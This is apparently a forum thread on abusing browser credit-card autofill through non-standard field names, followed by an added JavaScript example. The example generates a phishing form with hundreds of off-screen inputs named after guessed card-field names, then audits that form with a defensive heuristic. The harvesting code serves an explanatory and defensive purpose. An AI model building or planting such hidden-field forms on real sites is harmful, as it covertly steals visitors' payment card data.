by stevarino 3451 days ago
This requires the browser to recognize it as a credit card field.

Suppose a form uses a non-standard name for the field (say a localized name), and a user enters it at a legitimate site. Any attacker simply has to find these non-standard names for auto-complete to fill this in.

I feel like I've seen a credit card autofill before outside of normal controls.

1 comment

But then the browser won't autofill it, so what's the problem?
It will if the attacker uses the same custom name for his field. The attacker could try to suck as much data as possible by creating thousands of hidden fields having a lot of possible combinations for the names of these non-standard CC fields, and wait to get lucky.
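The harvesting trick the last reply describes, written out as an added example (this is not code from the thread or from any commenter): one innocuous visible field, plus a crowd of off-screen inputs whose names guess at the non-standard card-number names a legitimate site might have used, so that whichever guess matches gets autofilled. The token lists, the hypothetical `/collect` endpoint and the `auditForm` heuristic are assumptions made for the illustration; the audit shows the kind of check a browser or extension would need to apply before honouring autofill on such a page.

```javascript
// Added illustration of the "thousands of hidden fields" harvesting trick.
// Token lists are constructed for this example, not taken from the thread.
const LOCALE_TOKENS = ["cc", "card", "carte", "karte", "tarjeta", "cartao"];
const PART_TOKENS = ["number", "num", "numero", "nummer", "no"];
const SEPARATORS = ["", "_", "-"];
const CASES = [
  s => s,
  s => s.toUpperCase(),
  s => s[0].toUpperCase() + s.slice(1),
];

// Enumerate plausible non-standard names for a card-number field.
// The Set collapses duplicates produced by the case variants.
function candidateCardFieldNames() {
  const names = new Set();
  for (const a of LOCALE_TOKENS)
    for (const b of PART_TOKENS)
      for (const sep of SEPARATORS)
        for (const cs of CASES) names.add(cs(a) + sep + cs(b));
  return [...names];
}

// Attacker's page: one visible field the victim actually interacts with,
// and every candidate name as an off-screen input. /collect is hypothetical.
function buildHarvestFormHtml(names) {
  const hidden = names
    .map(n => `<input name="${n}" style="position:absolute;left:-9999px" tabindex="-1">`)
    .join("\n");
  return `<form action="/collect" method="post">
<input name="email" placeholder="Email">
${hidden}
<button>Subscribe</button>
</form>`;
}

// Minimal parser for the form above: name plus a visibility guess from the
// attributes. Real detection would use computed layout, not string matching.
function parseInputs(html) {
  const inputs = [];
  const re = /<input name="([^"]+)"([^>]*)>/g;
  let m;
  while ((m = re.exec(html)) !== null) {
    const attrs = m[2];
    const visible = !/left:-9999px|display:none|type="hidden"/.test(attrs);
    inputs.push({ name: m[1], visible });
  }
  return inputs;
}

const CARD_HINT = /(card|cc|carte|karte|tarjeta|cartao|cvv|cvc|expir)/i;

// Defender-side heuristic (an assumption for this example): only visible
// inputs are eligible for autofill, and a form is flagged when it carries
// invisible card-like inputs or when invisible inputs dwarf visible ones.
function auditForm(inputs) {
  const visible = inputs.filter(i => i.visible);
  const hiddenCardLike = inputs.filter(i => !i.visible && CARD_HINT.test(i.name));
  const hiddenCount = inputs.length - visible.length;
  return {
    fillable: visible.map(i => i.name),
    hiddenCardLike: hiddenCardLike.length,
    suspicious: hiddenCardLike.length > 0 || hiddenCount > 10 * Math.max(visible.length, 1),
  };
}

// Stand-alone run: build the harvesting form and audit it.
const harvestNames = candidateCardFieldNames();
const report = auditForm(parseInputs(buildHarvestFormHtml(harvestNames)));
console.log(`${harvestNames.length} guessed names, suspicious=${report.suspicious}, fillable=${report.fillable}`);
```

The point of `auditForm` is that the attack only works if the browser is willing to fill inputs the user cannot see; a policy of "fill only what is visible and only after the user picks the entry" removes the payoff regardless of how many names the attacker guesses.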